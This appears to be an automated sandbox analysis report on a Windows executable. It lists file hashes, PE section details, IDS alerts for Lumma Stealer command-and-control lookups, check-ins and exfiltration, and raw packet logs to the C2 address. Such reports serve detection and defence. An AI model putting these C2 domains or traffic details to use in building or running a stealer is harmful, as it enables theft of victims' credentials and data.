                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):155648
                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):294912
                                                                                                      Entropy (8bit):0.08441928760034874
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                      MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                      SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                      SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                      SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):40960
                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.946724755314697
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:random(2).exe
                                                                                                      File size:1'835'008 bytes
                                                                                                      MD5:4c7602a935a7b24e6262acd38505eb9a
                                                                                                      SHA1:e1e15c5e8c053eb523ffeb3a24bbe857e41db489
                                                                                                      SHA256:57ccc2313dbc37566c73b42a74283f967d0502a60d276a90afa1dfbee6a74aff
                                                                                                      SHA512:e46c30db23353e75311fc3709b93cc00a7fb9a11c0be1c0a69a464bb8378e541eee850a404560fa361ec335f8b27a52d386c88d2eac4b8ff13ee8f9e10551662
                                                                                                      SSDEEP:24576:auEmWjQCgNbYBeY9j5DV+iUptxjA/eiHVQnTXPZuNDkaThws8tXSbCUBwHiRzasl:auEfQCC0BeYLV4Hse+QTMpko8dwTBt
                                                                                                      TLSH:43853395DBB9C420ED98C37080EA9B8531BCB2D603F891B719C680653117D17A7EADFE
                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................t............H...........@...........................H....._.....@.................................W...k..
                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                      Entrypoint:0x888000
                                                                                                      Entrypoint Section:.taggant
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x67BB1B1D [Sun Feb 23 12:57:01 2025 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                      Instruction
                                                                                                      jmp 00007F83153A627Ah
                                                                                                      pmaxub mm3, qword ptr [ebx]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add cl, ch
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5b057 | 0x6b | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5a000 | 0x388 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5b1f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| (unnamed) | 0x1000 | 0x59000 | 0x29a00 | 56933c45689f077fc3289a98399619a7 | False | 0.999706737987988 | data | 7.977249264089444 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x5a000 | 0x388 | 0x400 | 15d5238ea963e38777b9c0d978fd6724 | False | 0.4580078125 | data | 5.485474923230325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x5b000 | 0x1000 | 0x200 | ccf29f3d771c91d7d57f2be2d044b619 | False | 0.150390625 | data | 1.0437720338377494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| (unnamed) | 0x5c000 | 0x298000 | 0x200 | 3a4b0b15b59c7ef968d45e1814ffe24e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| cnerjxoh | 0x2f4000 | 0x193000 | 0x192600 | 1a33eb8bbfac603b2a647937bebe0c49 | False | 0.994536225341721 | data | 7.954038506762716 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| ebptfdwj | 0x487000 | 0x1000 | 0x600 | cdc8fc82864ce5e4736bd8e30210304c | False | 0.5651041666666666 | data | 4.88002271023751 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x488000 | 0x3000 | 0x2200 | 8a7f805ee332dc6b0ad1fdc583d9e0bb | False | 0.07284007352941177 | DOS executable (COM) | 0.8118920124857406 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x5a058 | 0x330 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.4987745098039216 |
| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-03-05T09:16:54.075836+0100 | 2060414 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top) | 1 | 192.168.2.7 | 61579 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:54.101743+0100 | 2060424 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life) | 1 | 192.168.2.7 | 50023 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:54.124936+0100 | 2060410 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun) | 1 | 192.168.2.7 | 62223 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:54.268847+0100 | 2060418 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online) | 1 | 192.168.2.7 | 57190 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:54.372742+0100 | 2060422 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun) | 1 | 192.168.2.7 | 62349 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:54.396054+0100 | 2060416 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life) | 1 | 192.168.2.7 | 56090 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:54.415778+0100 | 2060420 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu) | 1 | 192.168.2.7 | 50506 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:54.432215+0100 | 2060412 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today) | 1 | 192.168.2.7 | 62980 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:54.955773+0100 | 2060413 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) | 1 | 192.168.2.7 | 49700 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:16:54.955773+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:16:55.204960+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49700 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:16:55.204960+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49700 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:16:55.745350+0100 | 2060413 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) | 1 | 192.168.2.7 | 49701 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:16:55.745350+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49701 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:16:57.213059+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49701 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:16:58.994747+0100 | 2060413 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) | 1 | 192.168.2.7 | 49703 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:16:58.994747+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49703 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:16:59.557880+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49703 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:00.218797+0100 | 2060413 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) | 1 | 192.168.2.7 | 49709 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:00.218797+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49709 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:02.544617+0100 | 2060413 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) | 1 | 192.168.2.7 | 49725 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:02.544617+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49725 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:19.514053+0100 | 2060413 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) | 1 | 192.168.2.7 | 49834 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:19.514053+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49834 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:20.952254+0100 | 2060413 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) | 1 | 192.168.2.7 | 49844 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:20.952254+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49844 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:22.981179+0100 | 2060413 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) | 1 | 192.168.2.7 | 49857 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:22.981179+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49857 | 104.21.64.1 | 443 | TCP |
| 2025-03-05T09:17:23.479116+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49857 | 104.21.64.1 | 443 | TCP |
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Mar 5, 2025 09:16:58.522450924 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.994642019 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.994746923 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.995919943 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.995933056 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.996217966 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.997484922 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.997636080 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.997665882 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.557879925 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.557971954 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.558073044 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.558243990 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.558263063 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.753413916 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.753482103 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.753540039 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.753854036 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.753866911 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.218729019 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.218796968 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.227283955 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.227298021 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.227583885 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.229368925 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.229470015 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.229496956 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.692126036 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.692226887 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.692274094 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.692553043 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.692574978 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.071062088 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.071106911 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.071194887 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.071819067 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.071830034 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.544506073 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.544616938 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.545840025 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.545845985 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.546469927 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.547588110 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.547693968 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.547728062 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.547786951 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.547801018 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:18.443047047 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:18.443170071 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:18.443263054 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:18.443417072 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:18.443428993 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.013297081 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.013343096 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.013401031 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.014262915 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.014297962 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.513976097 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.514053106 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.517241001 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.517261028 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.517518997 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.526294947 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.526380062 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.526392937 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.952356100 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.952471972 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:19.952517986 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.952781916 CET49834443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:19.952801943 CET44349834104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.480566025 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.480619907 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.480701923 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.481013060 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.481024981 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.952171087 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.952254057 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.953659058 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.953669071 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.953902960 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.955313921 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.956089020 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.956115007 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.957051039 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.957077026 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.957257986 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.957283974 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.957967997 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.957987070 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958106041 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958132029 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958262920 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958290100 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958297968 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958311081 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958437920 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958466053 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.958484888 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958602905 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.958636045 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.971600056 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.971771955 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.971791029 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:20.971817970 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.971848965 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.972069025 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:20.976646900 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.470372915 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.470467091 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.470540047 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.470701933 CET49844443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.470715046 CET44349844104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.509470940 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.509505033 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.509583950 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.509856939 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.509871006 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.981122971 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.981178999 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.983283997 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.983295918 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.983577967 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:22.987518072 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.987555027 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:22.987592936 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:23.479136944 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:23.479233027 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:23.479351044 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:23.479558945 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:23.479571104 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:23.479588032 CET49857443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:23.479593039 CET44349857104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:35.679136038 CET5792753192.168.2.7162.159.36.2
                                                                                                      Mar 5, 2025 09:17:35.685314894 CET5357927162.159.36.2192.168.2.7
                                                                                                      Mar 5, 2025 09:17:35.685499907 CET5792753192.168.2.7162.159.36.2
                                                                                                      Mar 5, 2025 09:17:35.691704035 CET5357927162.159.36.2192.168.2.7
                                                                                                      Mar 5, 2025 09:17:36.152529955 CET5792753192.168.2.7162.159.36.2
                                                                                                      Mar 5, 2025 09:17:36.157737017 CET5357927162.159.36.2192.168.2.7
                                                                                                      Mar 5, 2025 09:17:36.157790899 CET5792753192.168.2.7162.159.36.2
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 5, 2025 09:16:53.980285883 CET | 56792 | 53 | 192.168.2.7 | 1.1.1.1
Mar 5, 2025 09:16:53.989761114 CET | 53 | 56792 | 1.1.1.1 | 192.168.2.7
Mar 5, 2025 09:16:54.075835943 CET | 61579 | 53 | 192.168.2.7 | 1.1.1.1
